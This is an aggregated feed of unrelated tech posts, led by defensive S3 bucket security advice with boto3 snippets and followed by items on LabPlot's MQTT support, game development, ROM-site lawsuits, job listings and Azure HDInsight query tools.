  • When creating new buckets, applying encryption by default via server-side encryption (SSE-S3/SSE-C/SSE-KMS) and / or client-side encryption (a minimal boto3 sketch of these settings follows this list).
  • Creating an S3 inventory list to automatically report inventory, replication and encryption in an easy to use CSV / ORC format.
  • Testing, testing and testing some more to make sure the controls mentioned above have been implemented effectively and the data is secure.
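
As a hedged illustration of two of the steps above (default encryption and a lifecycle rule), here is a minimal boto3 sketch; the bucket name and the 90-day threshold are placeholders, not recommendations.

# Hedged boto3 sketch: default SSE-S3 encryption plus a lifecycle rule
# that archives old objects. "example-bucket" and 90 days are placeholders.
import boto3

s3 = boto3.client("s3")
bucket = "example-bucket"

# Default encryption: every new object gets SSE-S3 (AES256).
s3.put_bucket_encryption(
    Bucket=bucket,
    ServerSideEncryptionConfiguration={
        "Rules": [
            {"ApplyServerSideEncryptionByDefault": {"SSEAlgorithm": "AES256"}}
        ]
    },
)

# Lifecycle: transition objects to Glacier after 90 days.
s3.put_bucket_lifecycle_configuration(
    Bucket=bucket,
    LifecycleConfiguration={
        "Rules": [
            {
                "ID": "archive-old-data",
                "Status": "Enabled",
                "Filter": {"Prefix": ""},
                "Transitions": [{"Days": 90, "StorageClass": "GLACIER"}],
            }
        ]
    },
)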

Here at Tenable, I have researched five additional solutions you can use to evaluate the security of data stored in S3 buckets. These five solutions, when implemented correctly and incorporated into daily operational checklists, can help you quickly assess your organization’s cyber exposure in the public cloud and help you determine next steps for securing your business-critical data.

  • Amazon Macie: Automates data discovery and classification. Uses Artificial Intelligence to classify data files on S3 by leveraging a rules engine that identifies application data, correlates file extensions and predictable data themes, with strong regex matching to determine data type, cloud trail events, errors and basic alerts.
  • Security Monkey: An open source bootstrap solution on GitHub provided by Netflix. This implements monitoring, alerting and an auditable history of Cloud configurations across S3, IAM, Security Groups, Route 53, ELBs and SQS services.
  • Amazon Trusted Advisor: Helps perform multiple other functions apart from identifying insecure buckets.
  • Amazon S3 Inventory Tool: Provides either a CSV or ORC which further aids in auditing the replication and encryption status of objects in S3.
  • Custom S3 bucket scanning solutions: Scripts available on GitHub can be used to scan and check specific S3 buckets. These include kromtech’s S3-Inspector and sa7mon’s S3Scanner. In addition, avineshwar’s slurp clone monitors certstream and enumerates S3 buckets from each domain. A minimal sketch of such a custom check follows this list.
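
In the spirit of those custom scanners, the hedged boto3 sketch below lists the buckets in your own account and flags ACL grants to the public AllUsers/AuthenticatedUsers groups; it is a starting point, not a complete audit.

# Hedged sketch of a minimal custom S3 audit: flag any bucket ACL grant
# to the public AllUsers / AuthenticatedUsers groups in your account.
import boto3

PUBLIC_GROUPS = (
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
)

s3 = boto3.client("s3")
for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    acl = s3.get_bucket_acl(Bucket=name)
    for grant in acl["Grants"]:
        if grant["Grantee"].get("URI") in PUBLIC_GROUPS:
            print(f"{name}: public grant {grant['Permission']}")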

With the business demanding speed and ease of use, we expect to see the continued evolution of applications, systems and infrastructure away from on-premises data centers secured behind highly segregated networks to cloud-based “X-as-a-Service” architectures. The solutions and guidance highlighted above will help you identify security gaps in your environment and bootstrap solutions to automate resolution, alerting and auditing, thereby helping you meet your organization's Corporate Information Security Policies and Standards.

Learn more:


          New comment on GeekList Log Plays Faster with SPLU

by kataclysm

treegrass wrote:

I'm going to build an android bgg play logging app, inspired by this tool (board game geek isn't super mobile friendly, and I usually log from my phone), do you mind if I call it SPLU? If not that's fine I'll come up with something else but you already came up with such a great name I just figured why not use it


Um... the code for SPLU is open source so people know whether they can trust it. I'd be worried about closed-source code being called SPLU since people don't know what's in it and they also might get confused about the 2 different things with the same name... Maybe I could use your Android app first and help you think of a cool name for it? There's plenty of cool names where this one came from. I'd certainly be interested to try your app since SPLU is harder to use on mobile platforms.
          1. MonoGame - Why MonoGame?

Originally posted on: http://blog.loethen.net/cwilliams/archive/2017/02/06/232975.aspx

Why MonoGame?

You’re thinking about getting into game development, and you’re trying to decide how to get started. There are a number of great reasons to go with MonoGame.

  • Maybe you found Unity to be confusing and even a bit overwhelming.
  • Maybe you prefer to “live in the code.”
  • Maybe you’ve used XNA in the past, and want to work with something similar.
  • Maybe you want to create a game that can run on Macs, Windows PCs, Android phones or tablets, iPhones and iPads, or even Xbox & Playstation… with minimal alterations or rewrites to your existing code base.

MonoGame offers game developers an opportunity to write their game once, and target MANY different platforms.

MonoGame is the open source “spiritual successor” to XNA, which was a great game development framework that is no longer supported by Microsoft.

There have been a number of quite successful games created in XNA and MonoGame. You can see a few here.

In the next post, I’ll cover what you will need, and where to find it. If you came directly to this page, you can find the complete list of articles here.


          Are you using cryptocurrencies? Request for info.

Originally posted on: http://blog.loethen.net/cwilliams/archive/2014/03/13/155671.aspx

Hey everyone,

I'm working on an open source library involving Bitcoin and I was wondering how many (if any) of you are currently working with cryptocurrencies in your apps & games?
 
Whether you are buying/selling them, or just accepting them as a form of payment, I'd like to get some idea of what you're doing, what APIs you're hitting, what you think of it overall, and how I can (possibly?) make things like microtransactions and in-app purchases easier for you.
 
Feel free to leave a comment on this post, or message me if you don't want to talk about it publicly.
 
Thanks!
Chris

          Inviting Experts to Share Knowledge
Inviting Experts to Share Knowledge

Open Source India (OSI) is the premier Open Source conference in Asia targeted at nurturing and promoting the Open Source ecosystem in the subcontinent. Started as LinuxAsia in 2004, OSI has been at the helm of bringing together the Open Source industry and the community in the last 14 years. The 15th edition of OSI […]

The post Inviting Experts to Share Knowledge appeared first on Open Source For You.


          A Quick Dive into Kata Containers 1.0
A Quick Dive into Kata Containers 1.0

Kata Containers is a free and open source project aimed at building standard lightweight virtual machines (VMs). These VMs have the feel of containers and work like them, but have the security isolation of VMs. Kata Containers has community support but is looking for more contributors with varied expertise and skills. During the latest OpenStack […]

The post A Quick Dive into Kata Containers 1.0 appeared first on Open Source For You.


          LabPlot's MQTT in the finish line
Hello everyone. GSoC is coming to its end, so I think I should give a report about what's been done since the last post, and also make a brief evaluation and summary of the project itself.

As I've written in my last post, the main focus was on improving the quality of the code: cleaning, optimizing and properly documenting it, and also making it more digestible for other developers.

The next step was searching for bugs and then fixing them. In order to do this properly, I implemented a unit test for the main MQTT related features. This proved to be useful, since it helped discover several hidden bugs and errors, which were all corrected. The main features that tests were developed for are: checking if a topic contains another one, checking if two topics are "common topics" (meaning they differ at only one level and are the same size), managing messages, and subscribing & unsubscribing.
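
For illustration, here is a hedged Python sketch of the two topic relations those tests cover (LabPlot itself is C++, so this is not its code), assuming standard MQTT wildcard semantics: '+' matches exactly one level and '#' matches the whole remainder.

# Illustrative sketch of the two MQTT topic relations described above.
# Assumes standard wildcard semantics: '+' matches exactly one level,
# '#' matches everything that follows.

def contains(filter_topic, topic):
    """Does a subscription filter cover a concrete topic?"""
    f, t = filter_topic.split("/"), topic.split("/")
    for i, level in enumerate(f):
        if level == "#":            # '#' swallows the rest of the topic
            return True
        if i >= len(t) or (level != "+" and level != t[i]):
            return False
    return len(f) == len(t)

def common_topics(a, b):
    """Same number of levels, differing at exactly one of them."""
    la, lb = a.split("/"), b.split("/")
    return len(la) == len(lb) and sum(x != y for x, y in zip(la, lb)) == 1

assert contains("home/+/temp", "home/kitchen/temp")
assert contains("home/#", "home/kitchen/temp")
assert not contains("home/+", "home/kitchen/temp")
assert common_topics("home/kitchen/temp", "home/livingroom/temp")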

As I said in the previous post, a problem was that LabPlot couldn't plot QDateTime, so using an index column was necessary. Fortunately, Alexander Semke, as he promised, dealt with the matter, so plotting data from a single topic is now possible without needing any additional data. I'm truly thankful to Alexander for this.

The main improvements were related to algorithms needed for subscribing and unsubscribing. This process is now more optimal, and I really hope that is bug-free, since a lot of time was spent on testing every possible scenario for this feature. Not only the algorithms were improved regarding this feature, but the user interface as well. Now we use two tree widgets, which really does look better than the previous list widget (used for listing subscriptions). Using the tree widget for listing subscriptions made room for further improvements. Now not only the subscription is listed, but if the subscription contains wildcards, then every topic contained by the subscription and present in the topic tree will be added as children of the subscription, in order to make the user's life easier. Searching for root subscriptions in the tree widget is possible just like in the case of the topic tree widget.
 
New UI for subscribing & unsubscribing

Another improvement is dealing properly with multiple MQTTClient objects, which wasn't quite right at the time of the last post. Now it works fine, and the user can easily control each of the MQTTClients using the LiveDataDock. Another bug/absurdity was fixed: the user could add multiple MQTTClients with the same hostname, which is quite illogical (since the user can control every topic of a broker with a single MQTTClient). Another minor visual improvement is that an icon for MQTTClient and MQTTSubscription was added.
 
Dealing with multiple MQTTClients


As I presented the major improvements, I think it's high time I showed you a possible and practical use of the features developed, and the benefits of LabPlot having MQTT support. MQTT, as I mentioned in earlier posts, is mainly used to communicate data collected by sensors. So if one had the possibility and adequate sensors, then one could save & plot data collected by those sensors. However, there are less sophisticated uses as well. As we all know, our phones have quite a few sensors which could be put to use. And there is an application for this, which can be used by everyone who owns a smartphone: Sensor Node Free. In the app the user can choose from multiple sensors, the data of which can be sent to a preferred MQTT broker using a preferred topic name, as you can see in the next picture.
Choosing the sensors, setting the broker and the topic name in the app
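
For reference, receiving such readings outside LabPlot takes only a few lines with the paho-mqtt client; in this hedged sketch the broker host and the topic are placeholders for whatever you configure in the app.

# Hedged sketch: subscribing to phone sensor readings with paho-mqtt.
# The broker host and topic ("phone/accelerometer/#") are placeholders
# for whatever is configured in the Sensor Node Free app.
import paho.mqtt.client as mqtt

def on_message(client, userdata, msg):
    # Print topic + payload so the x/y/z streams can be told apart.
    print(msg.topic, msg.payload.decode())

client = mqtt.Client()
client.on_message = on_message
client.connect("broker.hivemq.com", 1883)  # assumption: a public test broker
client.subscribe("phone/accelerometer/#")
client.loop_forever()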

Of course, any app that has these features could be used (for example a fitness app), but my mentor suggested this one. The data of these sensors is plotted in the demo video. Almost every sensor sends data divided into x, y, z axes. These three will be shown in the same plot, with their data set as the Y value and the QDateTime allocated to the values as the X value. The curves based on data from the x axis will be red, the y axis green, and the z axis purple. The plotting had been running for a while before I started recording the video. So here is the demo video:

Demo video


And finally, here comes the evaluation/summary. I truly think that every feature presented in my proposal is implemented and working, so the main aim is met: LabPlot now has full support for MQTT. There were difficulties along the way, but with work, and help from my mentor, everything was dealt with. As I said, everything works, but some unforeseen bugs or errors might appear in the future. Some steps for the future may be to improve the overall performance of the new features.

Working on this project for the last 3 months has been a great experience, and I can honestly say that I improved my coding skills and way of thinking in a way I hadn't even dreamt of. I'm more than grateful to my mentor, Kristóf, who always helped me and had my back if I encountered any hardship. I'd also like to express my gratitude towards Alexander Semke, my mentor's former mentor and an invaluable member of the LabPlot team, who also helped me a great deal. I am determined to further improve the features, even after GSoC has ended. I would be more than happy to stay in this amazing team and help them whenever they need me. It's my goal for next summer to join GSoC again and work on LabPlot with Kristóf, since I really liked being part of this team. I truly think that people should contribute more to the open source community, and the end of GSoC shouldn't mean the end of the involvement.

This is it, guys. Thank you for reading the post, and thank you for your interest in my project. If there's any development regarding my project or a new task (in the future) I'll let you know here. Bye :)

          WhiteSource unveils free open source Vulnerability Checker

WhiteSource announced the release of its Vulnerability Checker, a free tool that provides companies with immediate, real-time alerts on the 50 most critical open source vulnerabilities published in the open source community. The new standalone CLI tool is free to use and available for anyone to download as a desktop application directly from the WhiteSource website. Once downloaded, the Vulnerability Checker offers users the opportunity to import and scan any library and run a quick … More

The post WhiteSource unveils free open source Vulnerability Checker appeared first on Help Net Security.


          TBS Source One Frame

TBS Source One frame. Since the files were open source I figured why not.
Print 2 camera mounts and 4 arms. Pick between M3 holes or press nut holes on the arm plate.

https://youtu.be/8qjpnIgd-O4
https://youtu.be/oWpCZgJzntc


          HijackThis Fork Portable 2.8.0.4 (browser hijack scanner) Released

HijackThis Portable 2.8.0.4 has been released. HijackThis Fork is a settings scanner that can find common settings changes made by malware and other software. Advanced users can use it to find and reset settings that have changed. Like most system tools, this app requires admin rights. It's packaged in PortableApps.com Format so it can easily integrate with the PortableApps.com Platform. And it's open source and completely free.

Update automatically or install from the portable app store in the PortableApps.com Platform.


          Google Chrome Portable 68.0.3440.106 Stable (web browser) Released

Google Chrome Portable 68.0.3440.106 Stable has been released. Google Chrome Portable is a web browser that runs web pages and applications quickly. The latest Beta and Dev builds are also available. It's packaged as a portable app, so you can take your browsing experience with you and it's in PortableApps.com Format so it can easily integrate with the PortableApps.com Platform. It's partially open source freeware for personal and business use.

Update automatically or install from the portable app store in the PortableApps.com Platform.


          Mozilla Firefox, Portable Edition 61.0.2 (web browser) Released

PortableApps.com is proud to announce the release of Mozilla Firefox®, Portable Edition 61.0.2. It's the Mozilla Firefox browser bundled with a PortableApps.com launcher as a portable app, so you can take your browser, bookmarks, settings and extensions on the go. And it's open source and completely free. Firefox Portable is a dual-mode 32-bit and 64-bit app, ensuring Firefox runs as fast as possible on every PC.

Mozilla®, Firefox® and the Firefox logo are registered trademarks of the Mozilla Foundation and used under license.

Update automatically or install from the portable app store in the PortableApps.com Platform.


          Telecommute All Source Analyst
A provider of performance solutions is seeking a Telecommute All Source Analyst. Must be able to:
+ Perform structured analysis on events of national intelligence interest
+ Manipulate various classified and open source databases
Skills and Requirements Include:
+ Experience authoring and developing reports, particularly finished products/reports
+ Familiarity with key US foreign policy and national security counterterrorism objectives
+ Excellent communication skills
+ Requires TS/SCI clearance with polygraph
          Prometheus monitoring tool joins Kubernetes as CNCF’s latest ‘graduated’ project
The Cloud Native Computing Foundation (CNCF) may not be a household name, but it houses some important open source projects including Kubernetes, the fast-growing container orchestration tool. Today, CNCF announced that the Prometheus monitoring and alerting tool had joined Kubernetes as the second “graduated” project in the organization’s history. The announcement was made at PromCon, the […]
          Xori Adds Speed, Breadth to Disassembler Lineup
A new open source tool, introduced at Black Hat USA, places a priority on speed and automation.
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          The Linux Foundation Announces Keynote Speakers for All New Open FinTech Forum to Explore the Intersection of Financial Services and Open Source
...events to scale any open source project, which together deliver an economic impact not achievable by any one company. More information can be found at www.linuxfoundation.org.

          (USA-CA-Lake Forest) Sr. Systems Engineer
**Sr.** Systems Engineer in Lake Forest, CA at Volt # Date Posted: _8/9/2018_ # Job Snapshot + **Employee Type:** Contingent + **Location:** 25892 Towne Centre Drive North Lake Forest, CA + **Job Type:** Computer Industry + **Duration:** 0 weeks + **Date Posted:** 8/9/2018 + **Job ID:** 131202 + **Pay Rate** $80000.0 - $100000.0/Year + **Contact Name** Volt Branch + **Phone** 760/710-3674 # Job Description This position requires senior skills in server technologies with extensive practical experience planning, implementing, verifying and troubleshooting local on-prem and cloud platform including Azure, VMware, Cisco and more. The candidate for this role should have at a minimum the following qualifications: + 3-5 years of experience managing Azure cloud technologies and current Microsoft certification + 7-10 years of experience as a Microsoft Systems Engineer preferably with an MCSE certification + Experience with VMWare + Experience with the implementation and/or operations of medium to large-scale enterprise cloud infrastructure supporting a software development team + Knowledge of cloud networking architecture, cloud operations, security, automation and orchestration + Experience with High Availability/Site Recovery design principles + Advanced Knowledge of MS Server, Active Directory, Exchange, Microsoft SQL, Office 365 support and migration + Well-rounded knowledge of storage solutions such as Dell Equallogic, Nimble, Compellent, ISCSI, Fiber-Channel, etc… + Supporting servers such as Dell PowerEdge or HP ProLiant + Well versed in Data Backup and Recovery tools + Comfortable managing Antivirus or similar Enterprise Software tools + Deep understanding of TCP/IP networks and related technologies + Experience implementing and managing network/system monitoring tools + Experience supporting and managing Cisco (WiFi) networks + Ability to independently troubleshoot Cisco routers, Cisco switches, ASA Firewalls, Cisco Wireless equipment at a CCNA level + Available for afterhours support and on-call rotation as needed Scoping, architecting and implementing new LAN/WAN and Cloud (MS/Azure) environments + Diagnosing, troubleshooting and correcting issues with Cisco, LAN/Wireless hardware (Meraki), and Azure PaaS/IaaS workloads + Capturing and analyzing packet traces; assessing OS issues; implements Azure service changes + Participates in developing and generating conceptual, logical and physical network architecture/designs including drawings and device configurations + Participates in implementing enterprise and Cloud based security mechanisms and policies + Some scripting and automation (Python, bash, Linux, open source tools). + Serves as a tier 2 escalation resource for resolution of enterprise issues + Installing and configuring Cisco switching: Workgroup, Campus and Data Center products + Installing and configuring Wi-Fi and working with vendors on Wi-Fi related issues + Installing, configuring Cisco switches/Routers (VSS, OSPF, BGP) + Working closely with Telco providers and Clients on WAN upgrades/implementations + Working closely with DevOPs an DBA on architectural changes to cloud PaaS/IaaS environments + Working closely with colleagues to meet team goals and improve process and practices + Serves as a tier 3 escalation resource for resolution of complex enterprise issues To learn more about Volt, please visit http://www.volt.com and to see more of our job postings, please visit: http://jobs.volt.com Please call 760-7 _10_ -3674 or email ndost@volt.com for any questions. 
**Volt is an Equal Opportunity Employer** In order to promote this harmony in the workplace and to obey the laws related to employment, Volt maintains a strong commitment to equal employment opportunity without unlawful regard to race, color, national origin, citizenship status, ancestry, religion (including religious dress and grooming practices), creed, sex (including pregnancy, childbirth, breastfeeding and related medical conditions), sexual orientation, gender identity, gender expression, marital or parental status, age, mental or physical disability, medical condition, genetic information, military or veteran status or any other category protected by applicable law.
          (USA-MD-Columbia) Software Engineer/Developer
This position is for a senior software developer to design and implement SDN (Software Defined Networking) and NFV (Network Function Virtualization) components and interfaces for AT&T Global Public Sector customers in order to intelligently scale network services and enable rapid deployment of advanced cutting-edge features and services, and provide industry leading security, performance and reliability. The network services will be built on the Open Network Automation Platform (ONAP), an open source initiative based on the AT&T ECOMP (Enhanced Control, Orchestration, Management & Policy) project as well as the Open-O (Open Orchestrator) project to bring the capabilities for designing, creating, orchestrating and handling of the full lifecycle management of Virtual Network Functions, Software Defined Networks, and the services that all of these pieces enable. As a developer on an agile Scrum team, you will contribute to technical analysis of AT&T Global Public Sector customer network initiatives, specify detailed requirements and design for the impacted ONAP components, including (a) real time inventory of virtual network resources, (b) orchestration, control and activation of virtual network functions and services, (c) application control and policy management for closed loop control, and (d) network data collection and analytics, implement, and deploy these services onto the customer network. **Required Skills, Certification, Experience, and Education** + 5+ years of software development experience + Proficiency with one or more programming languages such as Python, Java, Javascript, C/C++ Experience developing and interfacing with RESTful APIs + Ability to work in a Linux environment including shell scripting. + Knowledge of basic networking principles such as the IP protocol suite (e.g. TCP, UDP, ICMP, etc.) + Exposure to OpenStack, Docker, Kubernetes and containers + Exposure to virtualization, SDN, Cloud technologies such as TOSCA, YANG, NETCONF, OpenStack, VMware, OpenDaylight + Bachelor’s degree or higher in Computer Science or related technical disciplines **Required Clearance:** Must be a US Citizen and possess Secret Clearance **Desired:** + Experience with NFV and experience in production/operationalization of VNF’s/onboarding on NFVi (Network Function Virtualization infrastructure) platforms. + Exposure to ONAP or AT&T ECOMP platforms with basic understanding of the major components including: Multi-VIM/Cloud, SDN Controller, Application Controller, Virtual Function Controller, A&AI, DCAE/Correlation engine, Service Orchestration, and the ability to apply “policy” across these components in the delivery of a service + Experience working with vCPE (virtual CPE) solutions (e.g. AT&T Flexware) for managed services and software-defined WAN + Some exposure to a commercial network automation platform such as Ciena Blue Planet or Cisco NSO (Network Services Orchestrator) + Experience with automation technologies such as Ansible, Puppet, Chef, Jenkins. + Experience working with open source communities and software AT&T is an Affirmative Action/Equal Opportunity Employer and we are committed to hiring a diverse and talented workforce. EOE/AA/M/F/D/V
          LXer: How to install Fork CMS on Ubuntu 18.04 LTS
Published at LXer: Fork CMS is a free and open source content management system (CMS) that comes with an intuitive and user-friendly web interface. In this tutorial, we will explain how to install Fork CMS...
          "You wouldn't download a car!"      Cache   Translate Page   Web Page Cache   
What Does Nintendo's Shutdown Of ROM-Sharing Sites Mean For Video Game Preservation? [Nintendo Life] "The recent news that Nintendo is taking legal action against two sites which illegally distributed ROMs has been met with an overwhelmingly positive response, and rightly so. The individuals sharing these files online care little for the intellectual property rights of the developers who slave away to make the games we get hours of enjoyment out of, and instead leverage the growing interest in retro gaming purely to plaster their sites with garish advertisements for mail-order girlfriends and other dubious businesses. Nintendo – a company traditionally very protective of its IP – has struck a blow which will hopefully have long-term ramifications for the entire industry."

• Nintendo Suing Pirate Websites For Millions [Kotaku]
"On July 19, Nintendo filed suit in an Arizona Federal Court against the operator of two popular retro gaming sites, which had been hosting ROMS of some of the company's most famous games. The suit alleges that the two sites, LoveROMS.com and LoveRETRO.co—both owned and operated by Jacob Mathias—are "built almost entirely on the brazen and mass-scale infringement of Nintendo's intellectual property rights." "In addition to Nintendo's video games", the suit says, "Defendants reproduce, distribute, and publicly perform a vast library of Nintendo's other copyrighted works on and through the LoveROMs and LoveRETRO websites, including the proprietary BIOS software for several of Nintendo's video game systems and thousands of Nintendo's copyrighted musical works and audio recordings.""
• Lawsuit threat shuts down ROM downloads on major emulation site [Ars Technica]
"In the wake of Nintendo's recent lawsuits against other ROM distribution sites, major ROM repository EmuParadise has announced it will preemptively cease providing downloadable versions of copyrighted classic games. While EmuParadise doesn't seem to have been hit with any lawsuits yet, site founder MasJ writes in an announcement post that "it's not worth it for us to risk potentially disastrous consequences. I cannot in good conscience risk the futures of our team members who have contributed to the site through the years. We run EmuParadise for the love of retro games and for you to be able to revisit those good times. Unfortunately, it's not possible right now to do so in a way that makes everyone happy and keeps us out of trouble." EmuParadise will continue to operate as a repository for legal downloads of classic console emulators, as well as a database of information on thousands of classic games. "But you won't be able to get your games from here for now," as MasJ writes."
• Emulation isn't a dirty word, and one man thinks it can save gaming's history [Polygon]
""According to the Film Foundation, over half the films made before 1950 are gone," Cifaldi said. "I don't mean that you can't buy these on DVD. I mean they're gone. They don't exist anymore." For films produced before 1920, Cifaldi said, that number jumps to 80 percent. "That terrified me. I wasn't particularly a film buff, but the idea of these works just disappearing forever and never being recoverable scared the crap out of me. So I started wondering is anyone doing this for games. Is anyone making sure that video games aren't doing the same stupid shit that film did to make their heritage disappear? "And yeah, there were people doing this. We didn't call them archivists. We didn't call them digital archeologists or anything. We called them software pirates." It's emulation's long association with piracy, Cifaldi said, that has given it a bad name. Nintendo in particular seems to have a particular aversion towards it, he noted, pointing to their official statement on the issue which has been available at their corporate website for the last 16 years."
• Nintendo vs. Emulation: The difficulty of archiving games [Nintendo Enthusiast]
"Creating and using ROMs/ISOs and emulators is not inherently illegal. The thing is, there's a very thin gray area between the border of legal and illegal in this case. For someone to play classic games completely legally without it being on the original hardware with the original software, they would need to be using an emulator that's running on custom code and doesn't use BIOS files obtained from an external source. As for the games, they would need to be backups created by the user, who would have to create them by dumping the data from their own original copies of said games. Thus, emulation becomes illegal as soon as file-sharing is involved, and the vast majority of folks using emulators is doing so thanks to file-sharing. This is why Nintendo has constantly been trying to take down emulation hubs as it considers them to be centers for piracy promotion."
• Yes, Downloading Nintendo ROMs Is Illegal (Even if You Own the Game) [Tom's Hardware]
"For the most part, emulators in and of themselves do not fall under any copyright infringement, depending on their purpose. And, as mentioned before, it's unlikely a firm will call copyright infringement on a game if no company own the rights to it, or if no one really cares about the game. But what about the games people and companies do care about? It turns out, you're welcome to emulate any game for backup, so long as it's not used for commercial use. Check out what the U.S. Copyright Office has to say about it:
"Under section 117, you or someone you authorize may make a copy of an original computer program if the new copy is being made for archival (i.e., backup) purposes only; you are the legal owner of the copy; and any copy made for archival purposes is either destroyed, or transferred with the original copy, once the original copy is sold, given away, or otherwise transferred."
But selling that backup copy is another story, according to the U.S. Copyright Office:
"If you lawfully own a computer program, you may sell or transfer that lawful copy together with a lawfully made backup copy of the software, but you may not sell the backup copy alone. ... In addition to being a violation of the exclusive right of distribution, such activity is also likely to be a violation of the terms of the license to the software. ... You should be wary of sites that offer to sell you a backup copy. And if you do buy an illegal backup copy, you will be engaging in copyright infringement if you load that illegal copy onto your computer ...""
• The retro gaming industry could be killing video game preservation [Eurogamer]
"The convoluted nature of the video game emulation sector means that emulators rarely stand still for long; like any other program they are iterated upon, improved, modified for different tasks and generally tinkered with endlessly, creating development forks which branch off in multiple directions. It transpired that the fork of Snes9x used in the Retron 5 could be directly attributed to De Matteis himself. "Snes9x Next/2010 was a speedhack-focused fork that I personally developed, open sourced and published on Github," he says. "I had to perform heavy alterations to this core to get it to run acceptably well on old hardware. It is likely they used the software for this exact reason; that the others were not up to par performance-wise and it offered a good balance between performance and compatibility. Needless to say, I was never consulted beforehand; software was simply taken and sold in spite of its license that expressly forbids this." In Hyperkin's defense, it's not like the company simply downloaded the code from the web and installed it on the Retron 5; like many firms of this type, it didn't develop the software in-house but instead purchased it from an external contractor. De Matteis knows who this individual is - and has informed Hyperkin that he is aware of their identity - but doesn't wish to name them here. Nonetheless, this contractor has profited off the hard work of the RetroArch team."

          Azure HDInsight Interactive Query: Ten tools to analyze big data faster

Customers use HDInsight Interactive Query (also called Hive LLAP, or Low Latency Analytical Processing) to query data stored in Azure Storage and Azure Data Lake Storage in a super-fast manner. Interactive Query makes it easy for developers and data scientists to work with big data using the BI tools they love most. HDInsight Interactive Query supports several tools for accessing big data in an easy fashion. In this blog we have listed the most popular tools used by our customers:

Microsoft Power BI

Microsoft Power BI Desktop has a native connector to perform direct queries against an HDInsight Interactive Query cluster. You can explore and visualize the data in an interactive manner. To learn more, see Visualize Interactive Query Hive data with Power BI in Azure HDInsight and Visualize big data with Power BI in Azure HDInsight.


Apache Zeppelin

The Apache Zeppelin interpreter concept allows any language or data-processing backend to be plugged into Zeppelin. You can access Interactive Query from Apache Zeppelin using a JDBC interpreter. To learn more, please see Use Zeppelin to run Hive queries in Azure HDInsight.


Visual Studio Code

With HDInsight Tools for VS Code, you can submit interactive queries as well as look at job information in HDInsight Interactive Query clusters. To learn more, please see Use Visual Studio Code for Hive, LLAP or pySpark.


Visual Studio

Visual Studio integration helps you create and query tables in a visual fashion. You can create Hive tables on top of data stored in Azure Data Lake Storage or Azure Storage. To learn more, please see Connect to Azure HDInsight and run Hive queries using Data Lake Tools for Visual Studio.


Ambari Hive View

Hive View is designed to help you author, optimize, and execute queries. With Hive View you can:

• Browse databases.
• Write queries or browse query results in full-screen mode, which can be particularly helpful with complex queries or large query results.
• Manage query execution jobs and history.
• View existing databases, tables, and their statistics.
• Create/upload tables and export table DDL to source control.
• View visual explain plans to learn more about the query plan.

To learn more, please see Use Hive View with Hadoop in Azure HDInsight.


Beeline

Beeline is a Hive client that is included on the head nodes of an HDInsight cluster. Beeline uses JDBC to connect to HiveServer2, a service hosted on the HDInsight cluster. You can also use Beeline to access Hive on HDInsight remotely over the internet. To learn more, please see Use Hive with Hadoop in HDInsight with Beeline.


Hive ODBC

The Open Database Connectivity (ODBC) API is a standard interface for database access; the Hive ODBC driver enables ODBC-compliant applications to interact seamlessly with Hive through that standard interface. Learn more about how Microsoft publishes the HDInsight Hive ODBC driver.
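
As a quick, hedged illustration, the sketch below queries Hive through an ODBC DSN from Python with pyodbc. The DSN name, credentials, and table are placeholder assumptions (the DSN itself would first be configured with the Hive ODBC driver); treat this as a sketch rather than the official sample.

```python
# A minimal sketch: querying Hive through an ODBC DSN with pyodbc.
# "HiveLLAP", the credentials, and the table name are placeholder assumptions.
import pyodbc

# Hive has no transactions, so enable autocommit on the connection.
conn = pyodbc.connect("DSN=HiveLLAP;UID=admin;PWD=<password>", autocommit=True)
cursor = conn.cursor()
cursor.execute(
    "SELECT deviceplatform, COUNT(*) AS n "
    "FROM hivesampletable GROUP BY deviceplatform"
)
for row in cursor.fetchall():
    print(row.deviceplatform, row.n)
conn.close()
```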


Tableau

Tableau is a very popular data visualization tool. Customers can build visualizations by connecting Tableau to HDInsight Interactive Query.


DBeaver

DBeaver is a free and open source (Apache-licensed) SQL client and database administration tool. It uses the JDBC API to connect to SQL-based databases. To learn more, see How to use DBeaver with Azure #HDInsight.


Excel

Microsoft Excel is the most popular data analysis tool, and connecting it with big data is even more interesting for our customers. An Azure HDInsight Interactive Query cluster can be integrated with Excel through ODBC connectivity. To learn more, see Connect Excel to Hadoop in Azure HDInsight with the Microsoft Hive ODBC driver.


Try HDInsight now

We hope you will take full advantage of the fast query capabilities of HDInsight Interactive Query using your favorite tools. We are excited to see what you will build with Azure HDInsight. Read this developer guide and follow the quick start guide to learn more about implementing these pipelines and architectures on Azure HDInsight. Stay up-to-date on the latest Azure HDInsight news and features by following us on Twitter #HDInsight and @AzureHDInsight. For questions and feedback, please reach out to AskHDInsight@microsoft.com.

About HDInsight

Azure HDInsight is Microsoft’s premium managed offering for running open source workloads on Azure. Azure HDInsight powers mission-critical applications in a wide variety of sectors, including manufacturing, retail, education, nonprofit, government, healthcare, media, banking, telecommunications, and insurance, with use cases ranging from ETL to data warehousing, from machine learning to IoT, and more.

Additional resources: Get started with HDInsight Interactive Query Cluster in Azure.
          One-to-One at Scale: The Confluence of Behavioral Science and Technology and How It’s ...

Consumer and business customers have increasing expectations that businesses provide products and services customized for their unique needs. Adaptive intelligence and machine learning technology, combined with insights into behavior, make this customization possible. The financial services industry is moving aggressively to take advantage of these new capabilities. In March 2018, Bank of America launched Erica, a virtual personal assistant—a chatbot—powered by AI. In just three months, Erica surpassed one million users.

But achieving personalization at scale requires an IT infrastructure that can handle huge amounts of data and process it in real time. Engineered systems purpose-built for these cognitive workloads provide the foundation that helps make this one-to-one personalization possible.

Bradley Leimer, Managing Director and Head of Fintech Strategy at Explorer Advisory & Capital, provides consulting and investment advisory services to start-ups, accelerators, and established financial services companies. As the former Head of Innovation and Fintech Strategy at Santander U.S., his team connected the bank to the fintech ecosystem. Bradley spoke with us recently about how behavioral science is evolving in the financial services industry and how new technological capabilities, when tied to human behavior, are changing the way organizations respond to customer needs.

I know you’re fascinated by behavioral science. How does it frame what you do in the financial sector?

